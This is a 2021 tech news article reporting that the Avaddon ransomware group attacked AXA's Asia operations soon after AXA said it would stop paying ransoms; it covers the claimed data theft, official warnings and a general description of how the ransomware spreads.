UPDATED 20:35 EDT / MAY 16 2021

SECURITY

After dropping support for ransom payments, AXA struck by ransomware in Asia

French multinational insurance firm AXA S.A. has been struck by a ransomware attack after the company announced May 9 that it would stop paying for ransomware crime payments.

Reuters reported the company said today that one of its Asia Assistance divisions had been targeted and that information technology services were affected in Thailand, Malaysia, Hong Kong and the Philippines. “As a result, certain data processed by Inter Partners Asia (IPA) in Thailand has been accessed,” AXA noted.

According to Hackread, the Avaddon ransomware group was behind the attack and is claiming responsibility on its dark web site. The group claims to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contract and reports, customer IDs and bank account scanned papers, hospital and doctor reserved material (private investigation for fraud) and customer medical reports including HIV, hepatitis, STD and other illness reports.

Avaddon provided copies of two passports as evidence, one Thai and the other from the U.K.

The ransom being demanded was not disclosed. The ransomware group said AXA has 240 hours to communicate and cooperate, otherwise it will leak valuable company documents.

The attack by Avaddon comes just under a week since both the U.S. Federal Bureau of Investigation and the Australian Cyber Security Centre issued warnings that an Avaddon campaign was targeting organizations worldwide. The FBI said that Avaddon ransomware affiliates are trying to breach the networks of manufacturing, healthcare and other private sector organizations, while the ACSC said that the targets included government, finance, law enforcement, energy, information technology and health.

“In addition to encryption of data, victims are threatened with the publication of stolen data, as well as Distributed Denial of Service against their network,” the ACSC added.

Avaddon dates to around June last year and was first detailed in July by Trend Micro Inc. Avaddon ransomware attacks are typically propagated through emails with a JavaScript attachment. Once the attachment is downloaded and run, it users a PowerShell command and the BITSAdmin command-line tool to download and run the ransomware payload.

At this point, users have their wallpaper changed to an image that states that “all your files have been encrypted” and told to read a ransomware note. The note provide instructions on how the affected users can recover their encrypted files.

Photo: Kokky92/Wikimedia Commons

A message from John Furrier, co-founder of SiliconANGLE:

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU